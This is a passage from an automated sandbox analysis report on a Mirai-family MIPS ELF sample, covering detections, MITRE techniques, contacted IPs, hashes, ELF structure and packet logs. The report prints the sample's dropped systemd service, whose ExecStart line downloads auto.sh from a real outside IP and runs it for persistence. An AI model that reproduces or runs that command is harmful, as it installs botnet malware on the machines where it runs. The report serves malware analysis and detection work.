Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: u-binfmt/mipsel/var/lib/vmware
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: !/var/lib/vmwareQP
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5506.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5512.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	1 Hidden Files and Directories	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Service Stop
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	1 File Deletion	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mpsl.elf	53%	Virustotal		Browse
mpsl.elf	53%	ReversingLabs	Linux.Trojan.Mirai
mpsl.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tcpdown.su	23.94.242.130	true	false		high
tcpdown.suF	unknown	unknown	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://154.216.20.138/auto.sh;	mpsl.elf, startup_command.service.13.dr	false		high
http://154.216.20.138/auto.sh	startup_command.service.13.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.94.37.42	unknown	United States	36352	AS-COLOCROSSINGUS	false
45.200.149.95	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
23.94.242.130	tcpdown.su	United States	36352	AS-COLOCROSSINGUS	false
45.200.149.249	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
104.168.33.8	unknown	United States	36352	AS-COLOCROSSINGUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
23.94.37.42	x86_64.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	sh4.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	x86_64.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
45.200.149.95	x86_64.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	x86_64.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
23.94.242.130	x86_64.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	x86_64.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
45.200.149.249	x86_64.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	i686.elf	Get hash	malicious	Unknown	Browse
	x86_64.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
104.168.33.8	x86_64.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	x86_64.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tcpdown.su	x86_64.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
tcpdown.su	sparc.elf	Get hash	malicious	Unknown	Browse	45.200.149.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
Africa-on-Cloud-ASZA	sh4.elf	Get hash	malicious	Unknown	Browse	45.200.149.96
	x86_64.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	powerpc.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	sparc.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	i686.elf	Get hash	malicious	Unknown	Browse	45.200.149.96
	i586.elf	Get hash	malicious	Unknown	Browse	45.200.149.96
	cZO.exe	Get hash	malicious	Unknown	Browse	45.200.148.158
	1.elf	Get hash	malicious	Unknown	Browse	156.228.14.8
	Fantazy.i686.elf	Get hash	malicious	Unknown	Browse	156.228.99.12
	Fantazy.arm4.elf	Get hash	malicious	Unknown	Browse	45.198.94.253
Africa-on-Cloud-ASZA	sh4.elf	Get hash	malicious	Unknown	Browse	45.200.149.96
	x86_64.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	powerpc.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	sparc.elf	Get hash	malicious	Unknown	Browse	45.200.149.249
	i686.elf	Get hash	malicious	Unknown	Browse	45.200.149.96
	i586.elf	Get hash	malicious	Unknown	Browse	45.200.149.96
	cZO.exe	Get hash	malicious	Unknown	Browse	45.200.148.158
	1.elf	Get hash	malicious	Unknown	Browse	156.228.14.8
	Fantazy.i686.elf	Get hash	malicious	Unknown	Browse	156.228.99.12
	Fantazy.arm4.elf	Get hash	malicious	Unknown	Browse	45.198.94.253
AS-COLOCROSSINGUS	sh4.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	x86_64.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	powerpc.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	arm.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	sparc.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	m68k.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	i686.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	i586.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	momo.mips.elf	Get hash	malicious	Mirai	Browse	23.94.40.4
	bash.elf	Get hash	malicious	Unknown	Browse	107.173.129.144
AS-COLOCROSSINGUS	sh4.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	x86_64.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	powerpc.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	arm.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	sparc.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	m68k.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	i686.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	i586.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	momo.mips.elf	Get hash	malicious	Mirai	Browse	23.94.40.4
	bash.elf	Get hash	malicious	Unknown	Browse	107.173.129.144

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/etc/systemd/system/startup_command.service

Download File

Process:	/tmp/mpsl.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	361
Entropy (8bit):	5.16738909970438
Encrypted:	false
SSDEEP:	6:z8jvIERZAMzdK+KOnFfltZCrXbcCmBNcCm4RcCmO/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXIpiQuj73GLHWrv
MD5:	AF7D62B73266E0B457B114FE91F7E926
SHA1:	11261AEF4573B56B67B32020049C69C7282FC212
SHA-256:	14CB525E5A6B8AAF20C38672F8A9F974A684990888214848818326A739906642
SHA-512:	3926FBB53496C3AAA34CC782BD5C8379E0AB94B11FE4E63BBBFEAC4E2B5057369C94BBE25AC56C3F04363076C91B978F9199FED97C5ED8377A6DC852B01EBFD9
Malicious:	false
Reputation:	low
Preview:	[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.Nyhh0c (deleted)

Download File

Process:	/tmp/mpsl.elf
File Type:	data
Category:	dropped
Size (bytes):	14
Entropy (8bit):	3.2359263506290334
Encrypted:	false
SSDEEP:	3:TgLJLG:TgLFG
MD5:	F38566EE0BC1CD8FBC1A2366D5C73FFE
SHA1:	670B71B3B2F7C95A453BE48DE048B4D331E9AF5C
SHA-256:	8DE045D1FFCA4ADCA0440D72EE8946E5BE883FA1036732770285BF5A272DD618
SHA-512:	E57F865160CA30D18A02E3A408DC813DE15AB05E4831E8F92F431320C331C3D0F6806831E099DD93A1D07AC22AB7C890957DE1078C71EB711780F116AA228165
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	/tmp/mpsl.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.388946222743811
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mpsl.elf
File size:	108'592 bytes
MD5:	aa498d8b14dff7783d7f01d4d4c9f8e4
SHA1:	94f84785a89ce84f4977178eaf5524c05831832e
SHA256:	22633b8d957952975d5680571716b1c2e5b392516a7218a51f3221af2c71d33a
SHA512:	0f9b0c5e61c2488f377aaa36ee9e0a89592367770609172bd9f50c311db6faa2d11005b0317795a79bb47e2fa4d37f64147ba62fd8c1fca74c70738db5526f68
SSDEEP:	1536:ygXHwnODnP1QGpapwiYiQ/GO4DqUXZSJvD3ZCu3qS9mTcH:y6HwnODnP112nJSVD3zUc
TLSH:	B2B3E606BB610FF7DCABCD3706E9170524CC950B22A93B3A7934D828F95B64B49E3974
File Content Preview:	.ELF....................`.@.4...........4. ...(...............@...@...........................E...E.....<...........Q.td...............................<...'!......'.......................<h..'!... .........9'.. ........................<8..'!...$.......Pn9

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	108032
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x16da0	0x0	0x6	AX	16
.fini	PROGBITS	0x416ec0	0x16ec0	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x416f20	0x16f20	0x2bf0	0x0	0x2	A	16
.ctors	PROGBITS	0x459b14	0x19b14	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x459b1c	0x19b1c	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x459b28	0x19b28	0x4	0x0	0x3	WA	4
.data	PROGBITS	0x459b30	0x19b30	0x400	0x0	0x3	WA	16
.got	PROGBITS	0x459f30	0x19f30	0x66c	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x45a59c	0x1a59c	0x30	0x0	0x10000003	WAp	4
.bss	NOBITS	0x45a5d0	0x1a59c	0xe780	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0xc72	0x1a59c	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x1a59c	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x19b10	0x19b10	5.4048	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x19b14	0x459b14	0x459b14	0xa88	0xf23c	4.0093	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 01:09:36.383241892 CET	40146	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:36.388063908 CET	2601	40146	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:36.388118029 CET	40146	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:36.391139030 CET	40146	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:36.395977020 CET	2601	40146	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:36.396019936 CET	40146	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:36.401094913 CET	2601	40146	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:37.244888067 CET	2601	40146	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:37.244955063 CET	40146	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:37.245135069 CET	40146	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:38.598500967 CET	45540	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:38.603238106 CET	2601	45540	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:38.603291988 CET	45540	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:38.608827114 CET	45540	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:38.613699913 CET	2601	45540	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:38.613740921 CET	45540	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:38.619515896 CET	2601	45540	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:39.437450886 CET	2601	45540	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:39.437519073 CET	45540	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:39.437556982 CET	45540	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:40.539949894 CET	40150	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:40.544701099 CET	2601	40150	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:40.544799089 CET	40150	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:40.546722889 CET	40150	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:40.551506042 CET	2601	40150	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:40.551551104 CET	40150	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:40.556334019 CET	2601	40150	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:41.376467943 CET	2601	40150	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:41.376528025 CET	40150	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:41.376595020 CET	40150	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:42.453880072 CET	45544	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:42.458776951 CET	2601	45544	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:42.458844900 CET	45544	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:42.460449934 CET	45544	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:42.465243101 CET	2601	45544	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:42.465291023 CET	45544	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:42.470088005 CET	2601	45544	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:43.300102949 CET	2601	45544	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:43.300178051 CET	45544	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:43.300237894 CET	45544	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:44.389441013 CET	40154	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:44.394342899 CET	2601	40154	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:44.394417048 CET	40154	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:44.395493984 CET	40154	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:44.400243044 CET	2601	40154	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:44.400285959 CET	40154	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:44.405003071 CET	2601	40154	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:45.243006945 CET	2601	40154	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:45.243072987 CET	40154	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:45.243117094 CET	40154	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:46.291834116 CET	45548	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:46.296673059 CET	2601	45548	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:46.296724081 CET	45548	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:46.298048019 CET	45548	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:46.302813053 CET	2601	45548	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:46.302853107 CET	45548	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:46.307715893 CET	2601	45548	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:47.178973913 CET	2601	45548	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:47.179039001 CET	45548	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:47.179076910 CET	45548	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:48.244405985 CET	53064	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:48.249300003 CET	2601	53064	23.94.37.42	192.168.2.13
Jan 7, 2025 01:09:48.249387980 CET	53064	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:48.250030041 CET	53064	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:48.254734993 CET	2601	53064	23.94.37.42	192.168.2.13
Jan 7, 2025 01:09:48.254802942 CET	53064	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:48.259577036 CET	2601	53064	23.94.37.42	192.168.2.13
Jan 7, 2025 01:09:48.804167032 CET	2601	53064	23.94.37.42	192.168.2.13
Jan 7, 2025 01:09:48.804289103 CET	53064	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:48.804290056 CET	53064	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:49.859718084 CET	45552	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:49.864568949 CET	2601	45552	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:49.864612103 CET	45552	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:49.865063906 CET	45552	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:49.869891882 CET	2601	45552	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:49.869930029 CET	45552	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:49.874735117 CET	2601	45552	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:50.742549896 CET	2601	45552	45.200.149.95	192.168.2.13
Jan 7, 2025 01:09:50.742613077 CET	45552	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:50.742649078 CET	45552	2601	192.168.2.13	45.200.149.95
Jan 7, 2025 01:09:51.808921099 CET	53068	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:51.813736916 CET	2601	53068	23.94.37.42	192.168.2.13
Jan 7, 2025 01:09:51.813788891 CET	53068	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:51.814261913 CET	53068	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:51.819020033 CET	2601	53068	23.94.37.42	192.168.2.13
Jan 7, 2025 01:09:51.819060087 CET	53068	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:51.823851109 CET	2601	53068	23.94.37.42	192.168.2.13
Jan 7, 2025 01:09:52.344682932 CET	2601	53068	23.94.37.42	192.168.2.13
Jan 7, 2025 01:09:52.344732046 CET	53068	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:52.344768047 CET	53068	2601	192.168.2.13	23.94.37.42
Jan 7, 2025 01:09:53.404983044 CET	55136	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:53.409867048 CET	2601	55136	23.94.242.130	192.168.2.13
Jan 7, 2025 01:09:53.409915924 CET	55136	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:53.410681009 CET	55136	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:53.415446043 CET	2601	55136	23.94.242.130	192.168.2.13
Jan 7, 2025 01:09:53.415488958 CET	55136	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:53.420226097 CET	2601	55136	23.94.242.130	192.168.2.13
Jan 7, 2025 01:09:54.093391895 CET	2601	55136	23.94.242.130	192.168.2.13
Jan 7, 2025 01:09:54.093451023 CET	55136	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:54.093491077 CET	55136	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:55.166763067 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:09:55.173275948 CET	2601	50408	104.168.33.8	192.168.2.13
Jan 7, 2025 01:09:55.173362970 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:09:55.173949957 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:09:55.179936886 CET	2601	50408	104.168.33.8	192.168.2.13
Jan 7, 2025 01:09:55.179982901 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:09:55.186043024 CET	2601	50408	104.168.33.8	192.168.2.13
Jan 7, 2025 01:09:55.801043034 CET	2601	50408	104.168.33.8	192.168.2.13
Jan 7, 2025 01:09:55.801132917 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:09:55.801166058 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:09:56.848757982 CET	55140	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:56.853627920 CET	2601	55140	23.94.242.130	192.168.2.13
Jan 7, 2025 01:09:56.853676081 CET	55140	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:56.854283094 CET	55140	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:56.859127045 CET	2601	55140	23.94.242.130	192.168.2.13
Jan 7, 2025 01:09:56.859167099 CET	55140	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:56.863972902 CET	2601	55140	23.94.242.130	192.168.2.13
Jan 7, 2025 01:09:57.521960974 CET	2601	55140	23.94.242.130	192.168.2.13
Jan 7, 2025 01:09:57.522011042 CET	55140	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:57.522070885 CET	55140	2601	192.168.2.13	23.94.242.130
Jan 7, 2025 01:09:58.592228889 CET	40170	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:58.598242998 CET	2601	40170	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:58.598308086 CET	40170	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:58.599195957 CET	40170	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:58.605921030 CET	2601	40170	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:58.605973959 CET	40170	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:58.612241983 CET	2601	40170	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:59.568238974 CET	2601	40170	45.200.149.249	192.168.2.13
Jan 7, 2025 01:09:59.568358898 CET	40170	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:09:59.568471909 CET	40170	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:10:00.786990881 CET	40172	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:10:00.794260025 CET	2601	40172	45.200.149.249	192.168.2.13
Jan 7, 2025 01:10:00.794322014 CET	40172	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:10:00.794972897 CET	40172	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:10:00.799808979 CET	2601	40172	45.200.149.249	192.168.2.13
Jan 7, 2025 01:10:00.799865961 CET	40172	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:10:00.804717064 CET	2601	40172	45.200.149.249	192.168.2.13
Jan 7, 2025 01:10:10.798213959 CET	40172	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:10:10.823257923 CET	2601	40172	45.200.149.249	192.168.2.13
Jan 7, 2025 01:10:11.129362106 CET	2601	40172	45.200.149.249	192.168.2.13
Jan 7, 2025 01:10:11.129427910 CET	40172	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:11:11.178282022 CET	40172	2601	192.168.2.13	45.200.149.249
Jan 7, 2025 01:11:11.183078051 CET	2601	40172	45.200.149.249	192.168.2.13
Jan 7, 2025 01:11:11.475688934 CET	2601	40172	45.200.149.249	192.168.2.13
Jan 7, 2025 01:11:11.475750923 CET	40172	2601	192.168.2.13	45.200.149.249

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 01:09:36.300565004 CET	46967	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:36.308017969 CET	53	46967	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:36.312282085 CET	38336	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:36.326466084 CET	53	38336	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:36.330194950 CET	43607	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:36.338979006 CET	53	43607	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:36.342773914 CET	53255	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:36.351916075 CET	53	53255	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:36.355298996 CET	39232	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:36.364597082 CET	53	39232	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:36.368201971 CET	33744	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:36.381639004 CET	53	33744	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:38.288156033 CET	35622	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:38.297297001 CET	53	35622	1.1.1.1	192.168.2.13
Jan 7, 2025 01:09:38.355067968 CET	49376	53	192.168.2.13	1.1.1.1
Jan 7, 2025 01:09:38.491684914 CET	53	49376	1.1.1.1	192.168.2.13
